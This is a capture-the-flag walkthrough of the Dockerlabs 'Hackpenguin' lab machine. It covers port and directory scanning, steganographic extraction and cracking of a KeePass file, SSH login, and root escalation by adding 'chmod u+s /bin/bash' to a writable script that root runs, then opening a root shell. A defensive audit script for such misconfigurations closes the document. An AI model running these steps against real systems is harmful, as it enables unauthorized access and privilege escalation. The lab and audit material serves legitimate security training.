Hackpenguin

September 21, 2024

Created by: El pingüino de Mario
Page: Dockerlabs
Difficulty: Medium
OS: Linux

I start with a scan of the open ports.

    nmap -p- -vvv --min-rate 5000 -Pn -sS 172.17.0.2 -oG scan

I then scan the open ports (22 and 80) with the default scripts and version detection.

    nmap -p22,80 -sCV 172.17.0.2 -oN ports

I access the website.

I will perform fuzzing to try to find directories.

    gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt -t 300

Since I do not find anything relevant, I will perform fuzzing to find files.

    gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt -t 500 -x .php,.js,.txt,.html,.py,.sh

I access the page penguin.html.

I download the image and look for hidden strings or files.

    strings penguin.jpg
    stegseek penguin.jpg

I find a file with the extension kdbx. I change its name, get its hash and try to get its password.

    mv penguin.jpg.out penguin.kdbx
    keepass2john penguin.kdbx > hash
    john --wordlist=/usr/share/wordlist/rockyou.txt hash

I use the password found to see the content of the file.

I find a username and password. I try to log in with SSH.

Once inside I find two files. I list the processes that are running on the system.

    ps -aux

I observe that the script is executed periodically and that I have write permission on it.

I add a command to be able to run as root.

    nano script.sh
    chmod u+s /bin/bash

I see that the script has been executed and now I can spawn a terminal as root.

    /bin/bash -p
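
The escalation above depends on two conditions that are easy to audit: a script that root executes periodically but another account can modify, and a setuid bit on a shell. The following is an added example from the defender's side, not part of the original writeup; it assumes `stat -c` (GNU coreutils or busybox), and the function names and the trusted-UID argument are hypothetical.

```sh
# Added example, not from the original writeup. Assumes `stat -c` (GNU/busybox).
# Function names and the trusted-UID argument are hypothetical.

# 0 if the mode grants write access to group or others.
writable_by_others() {
    wbo_mode=$(stat -c '%a' "$1") || return 2
    case "$wbo_mode" in
        *[2367]?|*[2367]) return 0 ;;   # write bit in the group or other digit
    esac
    return 1
}

# 0 (finding) if a script executed by trusted_uid can be changed by another
# account, via the file itself or its parent directory (file replacement).
script_is_tamperable() {
    sit_uid=${2:-0}
    sit_rc=1
    for sit_path in "$1" "$(dirname -- "$1")"; do
        sit_owner=$(stat -c '%u' "$sit_path") || return 2
        if [ "$sit_owner" != "$sit_uid" ]; then
            echo "FINDING: $sit_path is owned by uid $sit_owner, not $sit_uid"
            sit_rc=0
        fi
        if writable_by_others "$sit_path"; then
            echo "FINDING: $sit_path is writable by group or others"
            sit_rc=0
        fi
    done
    return "$sit_rc"
}

# 0 if the setuid bit is set, as on a shell after `chmod u+s`.
has_setuid() { [ -u "$1" ]; }

# Print each setuid shell listed in a shells file (default /etc/shells);
# returns 0 if at least one was found.
setuid_shells() {
    ss_rc=1
    while read -r ss_shell; do
        case "$ss_shell" in
            /*) if has_setuid "$ss_shell"; then echo "FINDING: setuid shell $ss_shell"; ss_rc=0; fi ;;
        esac
    done < "${1:-/etc/shells}"
    return "$ss_rc"
}

# Usage: sh audit.sh /path/to/script-run-by-root ...
for arg in "$@"; do script_is_tamperable "$arg" 0 || true; done
if [ "$#" -gt 0 ] && [ -r /etc/shells ]; then setuid_shells || true; fi
```

Run it as root against each script found in root's crontab or in the process list; any FINDING line means the script, its directory, or a shell needs its ownership or mode corrected.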